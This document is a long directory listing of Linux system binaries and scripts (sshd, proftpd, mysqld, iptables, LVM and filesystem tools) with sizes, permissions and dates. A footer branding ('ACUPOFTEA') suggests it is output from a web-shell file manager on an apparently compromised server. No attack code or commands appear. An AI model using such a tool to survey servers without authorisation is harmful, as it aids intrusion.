2022-03-23 01:53:46
genl
application/x-pie-executable
90.44 KB
-rwxr-xr-x
2026-04-15 07:15:26
getcap
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-04-09 03:04:48
getpcaps
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-04-09 03:04:48
getty
application/x-pie-executable
55.56 KB
-rwxr-xr-x
2026-03-06 04:10:04
groupadd
application/x-pie-executable
66.91 KB
-rwxr-xr-x
2024-02-06 12:54:23
groupdel
application/x-pie-executable
62.73 KB
-rwxr-xr-x
2024-02-06 12:54:23
groupmems
application/x-pie-executable
54.19 KB
-rwxr-xr-x
2024-02-06 12:54:23
groupmod
application/x-pie-executable
66.82 KB
-rwxr-xr-x
2024-02-06 12:54:23
grpck
application/x-pie-executable
58.13 KB
-rwxr-xr-x
2024-02-06 12:54:23
grpconv
application/x-pie-executable
50.01 KB
-rwxr-xr-x
2024-02-06 12:54:23
grpunconv
application/x-pie-executable
50.01 KB
-rwxr-xr-x
2024-02-06 12:54:23
grub-bios-setup
application/x-pie-executable
941.42 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-install
application/x-pie-executable
1.15 MB
-rwxr-xr-x
2022-12-18 09:21:26
grub-macbless
application/x-pie-executable
929.11 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mkconfig
text/x-shellscript
8.6 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mkdevicemap
application/x-pie-executable
215.7 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-probe
application/x-pie-executable
941.36 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-reboot
text/x-shellscript
4.73 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-set-default
text/x-shellscript
3.47 KB
-rwxr-xr-x
2022-12-18 09:21:26
halt
application/x-pie-executable
1.06 MB
-rwxr-xr-x
2026-06-05 03:40:28
hdparm
application/x-pie-executable
139.43 KB
-rwxr-xr-x
2022-03-23 01:57:38
httxt2dbm
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-07-06 04:41:46
hwclock
application/x-pie-executable
50.5 KB
-rwxr-xr-x
2026-03-06 04:10:04
iconvconfig
application/x-pie-executable
30.4 KB
-rwxr-xr-x
2026-07-24 12:11:17
in.proftpd
application/x-pie-executable
1.17 MB
-rwxr-xr-x
2025-02-05 01:53:13
init
application/x-pie-executable
1.76 MB
-rwxr-xr-x
2026-06-05 03:40:28
insmod
application/x-pie-executable
166.36 KB
-rwxr-xr-x
2026-04-30 12:32:42
installkernel
text/x-shellscript
2.6 KB
-rwxr-xr-x
2022-03-23 01:49:54
integritysetup
application/x-pie-executable
54.07 KB
-rwxr-xr-x
2024-11-14 03:21:19
invoke-rc.d
text/x-shellscript
16.12 KB
-rwxr-xr-x
2021-12-07 09:55:54
ip
application/x-pie-executable
702.05 KB
-rwxr-xr-x
2026-04-15 07:15:26
ip6tables
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-apply
text/x-shellscript
6.89 KB
-rwxr-xr-x
2021-01-15 10:03:39
ip6tables-legacy
application/x-pie-executable
96.95 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-legacy-restore
application/x-pie-executable
96.95 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-legacy-save
application/x-pie-executable
96.95 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-nft
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-nft-restore
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-nft-save
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-restore
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-restore-translate
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-save
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
ip6tables-translate
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-apply
text/x-shellscript
6.89 KB
-rwxr-xr-x
2021-01-15 10:03:39
iptables-legacy
application/x-pie-executable
96.95 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-legacy-restore
application/x-pie-executable
96.95 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-legacy-save
application/x-pie-executable
96.95 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-nft
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-nft-restore
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-nft-save
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-restore
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-restore-translate
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-save
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
iptables-translate
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
irqbalance
application/x-pie-executable
66.86 KB
-rwxr-xr-x
2023-10-16 09:22:18
irqbalance-ui
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2023-10-16 09:22:18
iscsi-iname
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2025-02-11 03:06:32
iscsi_discovery
text/x-shellscript
5.17 KB
-rwxr-xr-x
2021-09-05 11:32:54
iscsiadm
application/x-pie-executable
398.46 KB
-rwxr-xr-x
2025-02-11 03:06:32
iscsid
application/x-pie-executable
298.55 KB
-rwxr-xr-x
2025-02-11 03:06:32
iscsistart
application/x-pie-executable
278.56 KB
-rwxr-xr-x
2025-02-11 03:06:32
isosize
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
iucode-tool
application/x-pie-executable
58.34 KB
-rwxr-xr-x
2021-10-07 10:13:17
iucode_tool
application/x-pie-executable
58.34 KB
-rwxr-xr-x
2021-10-07 10:13:17
kbdrate
application/x-pie-executable
18.16 KB
-rwxr-xr-x
2022-12-16 02:14:33
killall5
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2021-12-14 09:17:22
kpartx
application/x-pie-executable
46.16 KB
-rwxr-xr-x
2023-10-31 10:21:59
ldattach
application/x-pie-executable
26.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
ldconfig
text/x-shellscript
387 B
-rwxr-xr-x
2026-07-24 12:11:17
ldconfig.real
application/x-pie-executable
1.16 MB
-rwxr-xr-x
2026-07-24 12:11:17
locale-gen
text/x-shellscript
4.29 KB
-rwxr-xr-x
2025-07-15 09:40:00
logrotate
application/x-pie-executable
102.24 KB
-rwxr-xr-x
2022-05-25 02:10:26
logsave
application/x-pie-executable
14.16 KB
-rwxr-xr-x
2023-10-09 01:50:10
losetup
application/x-pie-executable
70.52 KB
-rwxr-xr-x
2026-03-06 04:10:04
lsmod
application/x-pie-executable
166.36 KB
-rwxr-xr-x
2026-04-30 12:32:42
luksformat
text/x-perl
3.32 KB
-rwxr-xr-x
2022-01-13 09:44:36
lvchange
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvconvert
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvcreate
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvdisplay
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvextend
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvm
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvmconfig
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvmdiskscan
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvmdump
text/x-shellscript
10.07 KB
-rwxr-xr-x
2024-11-27 07:04:29
lvmpolld
application/x-pie-executable
236.2 KB
-rwxr-xr-x
2024-11-27 07:04:29
lvmsadc
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvmsar
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvreduce
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvremove
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvrename
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvresize
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvs
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
lvscan
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
make-bcache
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2022-03-23 09:42:55
make-ssl-cert
text/x-shellscript
6.65 KB
-rwxr-xr-x
2021-12-30 04:52:53
mdadm
application/x-pie-executable
601.31 KB
-rwxr-xr-x
2023-04-11 03:22:59
mdmon
application/x-pie-executable
258.44 KB
-rwxr-xr-x
2023-04-11 03:22:59
mkdosfs
application/x-pie-executable
50.83 KB
-rwxr-xr-x
2022-03-23 01:51:01
mke2fs
application/x-pie-executable
130.62 KB
-rwxr-xr-x
2023-10-09 01:50:10
mkfs
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
mkfs.bfs
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
mkfs.btrfs
application/x-pie-executable
471.25 KB
-rwxr-xr-x
2022-02-24 05:39:55
mkfs.cramfs
application/x-pie-executable
34.32 KB
-rwxr-xr-x
2026-03-06 04:10:04
mkfs.ext2
application/x-pie-executable
130.62 KB
-rwxr-xr-x
2023-10-09 01:50:10
mkfs.ext3
application/x-pie-executable
130.62 KB
-rwxr-xr-x
2023-10-09 01:50:10
mkfs.ext4
application/x-pie-executable
130.62 KB
-rwxr-xr-x
2023-10-09 01:50:10
mkfs.fat
application/x-pie-executable
50.83 KB
-rwxr-xr-x
2022-03-23 01:51:01
mkfs.minix
application/x-pie-executable
42.39 KB
-rwxr-xr-x
2026-03-06 04:10:04
mkfs.msdos
application/x-pie-executable
50.83 KB
-rwxr-xr-x
2022-03-23 01:51:01
mkfs.ntfs
application/x-pie-executable
70.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
mkfs.vfat
application/x-pie-executable
50.83 KB
-rwxr-xr-x
2022-03-23 01:51:01
mkfs.xfs
application/x-pie-executable
382.77 KB
-rwxr-xr-x
2024-10-17 06:49:09
mkhomedir_helper
application/x-pie-executable
22.17 KB
-rwxr-xr-x
2026-07-16 02:06:00
mkinitramfs
text/x-shellscript
12.16 KB
-rwxr-xr-x
2024-03-19 12:06:27
mklost+found
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2023-10-09 01:50:10
mkntfs
application/x-pie-executable
70.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
mkswap
application/x-pie-executable
46.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
modinfo
application/x-pie-executable
166.36 KB
-rwxr-xr-x
2026-04-30 12:32:42
modprobe
application/x-pie-executable
166.36 KB
-rwxr-xr-x
2026-04-30 12:32:42
mount.fuse
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2022-03-23 01:53:14
mount.fuse3
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2022-03-23 01:53:14
mount.lowntfs-3g
application/x-pie-executable
114.98 KB
-rwxr-xr-x
2026-07-11 03:55:48
mount.ntfs
application/x-pie-executable
159.01 KB
-rwxr-xr-x
2026-07-11 03:55:48
mount.ntfs-3g
application/x-pie-executable
159.01 KB
-rwxr-xr-x
2026-07-11 03:55:48
mpathpersist
application/x-pie-executable
31.05 KB
-rwxr-xr-x
2023-10-31 10:21:59
multipath
application/x-pie-executable
34.15 KB
-rwxr-xr-x
2023-10-31 10:21:59
multipathd
application/x-pie-executable
134.26 KB
-rwxr-xr-x
2023-10-31 10:21:59
mysqld
application/x-pie-executable
53.01 MB
-rwxr-xr-x
2026-06-20 11:54:34
needrestart
text/x-perl
38.73 KB
-rwxr-xr-x
2025-09-10 07:15:59
netplan
text/x-script.python
802 B
-rwxr-xr-x
2023-12-12 04:56:47
newusers
application/x-pie-executable
74.73 KB
-rwxr-xr-x
2024-02-06 12:54:23
nfnl_osf
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2024-01-16 09:14:30
nft
application/x-pie-executable
26.23 KB
-rwxr-xr-x
2026-02-24 08:38:43
nologin
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2024-02-06 12:54:23
ntfsclone
application/x-pie-executable
50.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfscp
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfslabel
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsresize
application/x-pie-executable
62.39 KB
-rwxr-xr-x
2026-07-11 03:55:48
ntfsundelete
application/x-pie-executable
50.38 KB
-rwxr-xr-x
2026-07-11 03:55:48
on_ac_power
text/x-shellscript
3.7 KB
-rwxr-xr-x
2025-06-04 02:47:30
overlayroot-chroot
text/x-shellscript
2.45 KB
-rwxr-xr-x
2020-08-17 04:00:58
ownership
application/x-pie-executable
14.45 KB
-rwxr-xr-x
2024-10-14 08:28:46
pam-auth-update
text/x-perl
20.5 KB
-rwxr-xr-x
2024-11-17 10:17:22
pam_extrausers_chkpwd
application/x-pie-executable
22.15 KB
-rwxr-sr-x
2026-07-16 02:06:00
pam_extrausers_update
application/x-pie-executable
30.15 KB
-rwxr-xr-x
2026-07-16 02:06:00
pam_getenv
text/x-perl
2.82 KB
-rwxr-xr-x
2024-11-17 10:17:22
pam_timestamp_check
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2026-07-16 02:06:00
paperconfig
text/x-shellscript
4.07 KB
-rwxr-xr-x
2022-03-24 12:14:21
parted
application/x-pie-executable
86.4 KB
-rwxr-xr-x
2022-03-24 04:22:22
partprobe
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2022-03-24 04:22:22
pdata_tools
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
phpdismod
text/x-shellscript
7.11 KB
-rwxr-xr-x
2024-12-04 03:44:19
phpenmod
text/x-shellscript
7.11 KB
-rwxr-xr-x
2024-12-04 03:44:19
phpquery
text/x-shellscript
6.24 KB
-rwxr-xr-x
2024-12-04 03:44:19
pivot_root
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
plymouthd
application/x-pie-executable
150.55 KB
-rwxr-xr-x
2022-03-18 10:45:18
poweroff
application/x-pie-executable
1.06 MB
-rwxr-xr-x
2026-06-05 03:40:28
proftpd
application/x-pie-executable
1.17 MB
-rwxr-xr-x
2025-02-05 01:53:13
proftpd-gencert
text/x-shellscript
1.64 KB
-rwxr-xr-x
2021-08-30 06:35:11
pvchange
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
pvck
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
pvcreate
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
pvdisplay
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
pvmove
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
pvremove
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
pvresize
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
pvs
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
pvscan
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
pwck
application/x-pie-executable
50.13 KB
-rwxr-xr-x
2024-02-06 12:54:23
pwconv
application/x-pie-executable
46.01 KB
-rwxr-xr-x
2024-02-06 12:54:23
pwunconv
application/x-pie-executable
42.01 KB
-rwxr-xr-x
2024-02-06 12:54:23
readprofile
application/x-pie-executable
22.41 KB
-rwxr-xr-x
2026-03-06 04:10:04
reboot
application/x-pie-executable
1.06 MB
-rwxr-xr-x
2026-06-05 03:40:28
remove-shell
text/x-shellscript
1.07 KB
-rwxr-xr-x
2022-03-23 01:49:54
resize2fs
application/x-pie-executable
66.3 KB
-rwxr-xr-x
2023-10-09 01:50:10
rmmod
application/x-pie-executable
166.36 KB
-rwxr-xr-x
2026-04-30 12:32:42
rmt
application/x-pie-executable
58.57 KB
-rwxr-xr-x
2026-07-20 02:42:36
rmt-tar
application/x-pie-executable
58.57 KB
-rwxr-xr-x
2026-07-20 02:42:36
rsyslogd
application/x-pie-executable
767.19 KB
-rwxr-xr-x
2026-07-20 04:31:06
rtacct
application/x-pie-executable
28.31 KB
-rwxr-xr-x
2026-04-15 07:15:26
rtcwake
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
rtmon
application/x-pie-executable
90.39 KB
-rwxr-xr-x
2026-04-15 07:15:26
runlevel
application/x-pie-executable
1.06 MB
-rwxr-xr-x
2026-06-05 03:40:28
runuser
application/x-pie-executable
54.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
service
text/x-shellscript
8.88 KB
-rwxr-xr-x
2022-02-15 10:32:46
setcap
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-04-09 03:04:48
setvesablank
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
setvtrgb
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2022-12-16 02:14:33
sfdisk
application/x-pie-executable
102.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
sgdisk
application/x-pie-executable
162.48 KB
-rwxr-xr-x
2022-03-23 01:53:46
shadowconfig
text/x-shellscript
885 B
-rwxr-xr-x
2021-11-11 03:42:38
shutdown
application/x-pie-executable
1.06 MB
-rwxr-xr-x
2026-06-05 03:40:28
split-logfile
text/x-perl
2.36 KB
-rwxr-xr-x
2026-07-06 04:41:46
sshd
application/x-pie-executable
899.7 KB
-rwxr-xr-x
2026-07-09 06:38:00
start-stop-daemon
application/x-pie-executable
47.35 KB
-rwxr-xr-x
2025-09-09 08:09:16
sudo_logsrvd
application/x-pie-executable
200.1 KB
-rwxr-xr-x
2026-03-02 01:08:06
sudo_sendlog
application/x-pie-executable
107.34 KB
-rwxr-xr-x
2026-03-02 01:08:06
sulogin
application/x-pie-executable
42.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
swaplabel
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
swapoff
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
swapon
application/x-pie-executable
42.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
switch_root
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
sysctl
application/x-pie-executable
30.23 KB
-rwxr-xr-x
2023-10-31 11:36:04
tarcat
text/x-shellscript
936 B
-rwxr-xr-x
2026-07-20 02:42:36
tc
application/x-pie-executable
618.08 KB
-rwxr-xr-x
2026-04-15 07:15:26
telinit
application/x-pie-executable
1.06 MB
-rwxr-xr-x
2026-06-05 03:40:28
thermald
application/x-pie-executable
554.6 KB
-rwxr-xr-x
2023-08-10 07:36:06
thin_check
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
thin_delta
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
thin_dump
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
thin_ls
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
thin_metadata_size
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
thin_repair
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
thin_restore
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
thin_rmap
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
thin_trim
application/x-pie-executable
1.33 MB
-rwxr-xr-x
2022-03-18 12:36:33
tipc
application/x-pie-executable
90.44 KB
-rwxr-xr-x
2026-04-15 07:15:26
tune2fs
application/x-pie-executable
102.55 KB
-rwxr-xr-x
2023-10-09 01:50:10
tzconfig
text/x-shellscript
106 B
-rwxr-xr-x
2026-07-17 12:51:09
u-d-c-print-pci-ids
text/x-shellscript
517 B
-rwxr-xr-x
2024-07-05 08:55:40
ufw
text/x-script.python
4.82 KB
-rwxr-xr-x
2023-07-17 01:55:25
umount.udisks2
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2025-08-21 02:17:01
unix_chkpwd
application/x-pie-executable
26.15 KB
-rwxr-sr-x
2026-07-16 02:06:00
unix_update
application/x-pie-executable
30.15 KB
-rwxr-xr-x
2026-07-16 02:06:00
update-ca-certificates
text/x-shellscript
5.29 KB
-rwxr-xr-x
2026-06-15 04:17:29
update-grub
text/x-shellscript
64 B
-rwxr-xr-x
2022-12-02 03:18:47
update-grub-gfxpayload
text/x-shellscript
301 B
-rwxr-xr-x
2015-03-27 05:50:35
update-grub2
text/x-shellscript
64 B
-rwxr-xr-x
2022-12-02 03:18:47
update-gsfontmap
text/x-shellscript
470 B
-rwxr-xr-x
2025-09-25 04:42:27
update-info-dir
text/x-shellscript
1.66 KB
-rwxr-xr-x
2022-02-06 12:48:45
update-initramfs
text/x-shellscript
6.74 KB
-rwxr-xr-x
2024-03-19 12:05:17
update-locale
text/x-perl
2.99 KB
-rwxr-xr-x
2025-07-15 09:40:00
update-mime
text/x-perl
9.39 KB
-rwxr-xr-x
2026-07-03 01:05:05
update-passwd
application/x-pie-executable
34.56 KB
-rwxr-xr-x
2022-03-23 09:42:40
update-pciids
text/x-shellscript
1.71 KB
-rwxr-xr-x
2021-08-30 02:45:58
update-rc.d
text/x-perl
16.92 KB
-rwxr-xr-x
2021-12-07 09:55:54
update-shells
text/x-shellscript
3.72 KB
-rwxr-xr-x
2022-03-23 01:49:54
upgrade-from-grub-legacy
text/x-shellscript
1.56 KB
-rwxr-xr-x
2022-12-02 03:18:47
usb_modeswitch
application/x-pie-executable
59.66 KB
-rwxr-xr-x
2022-03-25 09:53:05
usb_modeswitch_dispatcher
text/plain
26.78 KB
-rwxr-xr-x
2022-03-25 09:53:05
usbmuxd
application/x-pie-executable
86.6 KB
-rwxr-xr-x
2025-12-11 01:43:43
useradd
application/x-pie-executable
127.66 KB
-rwxr-xr-x
2024-02-06 12:54:23
userdel
application/x-pie-executable
86.85 KB
-rwxr-xr-x
2024-02-06 12:54:23
usermod
application/x-pie-executable
123.46 KB
-rwxr-xr-x
2024-02-06 12:54:23
uuidd
application/x-pie-executable
30.85 KB
-rwxr-xr-x
2026-03-06 04:10:04
validlocale
text/x-perl
1.73 KB
-rwxr-xr-x
2025-07-15 09:40:00
vcstime
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2022-12-16 02:14:33
vdpa
application/x-pie-executable
30.56 KB
-rwxr-xr-x
2026-04-15 07:15:26
veritysetup
application/x-pie-executable
43.76 KB
-rwxr-xr-x
2024-11-14 03:21:19
vgcfgbackup
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgcfgrestore
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgchange
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgck
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgconvert
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgcreate
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgdisplay
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgexport
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgextend
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgimport
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgimportclone
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgmerge
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgmknodes
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgreduce
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgremove
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgrename
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgs
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgscan
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vgsplit
application/x-pie-executable
2.89 MB
-rwxr-xr-x
2024-11-27 07:04:29
vigr
application/x-pie-executable
56.53 KB
-rwxr-xr-x
2024-02-06 12:54:23
vipw
application/x-pie-executable
56.53 KB
-rwxr-xr-x
2024-02-06 12:54:23
visudo
application/x-pie-executable
219.79 KB
-rwxr-xr-x
2026-03-02 01:08:06
vpddecode
application/x-pie-executable
14.58 KB
-rwxr-xr-x
2024-10-14 08:28:46
wipefs
application/x-pie-executable
38.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
xfs_admin
text/x-shellscript
1.37 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_bmap
text/x-shellscript
695 B
-rwxr-xr-x
2024-10-17 06:49:09
xfs_copy
application/x-pie-executable
82.48 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_db
application/x-pie-executable
652.44 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_estimate
application/x-pie-executable
14.16 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_freeze
text/x-shellscript
800 B
-rwxr-xr-x
2024-10-17 06:49:09
xfs_fsr
application/x-pie-executable
42.18 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_growfs
application/x-pie-executable
38.28 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_info
text/x-shellscript
1.26 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_io
application/x-pie-executable
199.55 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_logprint
application/x-pie-executable
78.33 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_mdrestore
application/x-pie-executable
26.17 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_metadump
text/x-shellscript
782 B
-rwxr-xr-x
2024-10-17 06:49:09
xfs_mkfile
text/x-shellscript
1.02 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_ncheck
text/x-shellscript
685 B
-rwxr-xr-x
2024-10-17 06:49:09
xfs_quota
application/x-pie-executable
90.16 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_repair
application/x-pie-executable
599.38 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_rtcp
application/x-pie-executable
18.15 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_scrub
application/x-pie-executable
106.27 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_scrub_all
text/x-script.python
5.87 KB
-rwxr-xr-x
2024-10-17 06:49:09
xfs_spaceman
application/x-pie-executable
42.3 KB
-rwxr-xr-x
2024-10-17 06:49:09
xtables-legacy-multi
application/x-pie-executable
96.95 KB
-rwxr-xr-x
2024-01-16 09:14:30
xtables-monitor
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
xtables-nft-multi
application/x-pie-executable
219.04 KB
-rwxr-xr-x
2024-01-16 09:14:30
zerofree
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2022-03-25 09:54:54
zic
application/x-pie-executable
62.32 KB
-rwxr-xr-x
2026-07-24 12:11:17
zramctl
application/x-pie-executable
54.52 KB
-rwxr-xr-x
2026-03-06 04:10:04
~ ACUPOFTEA - www.loginstore.com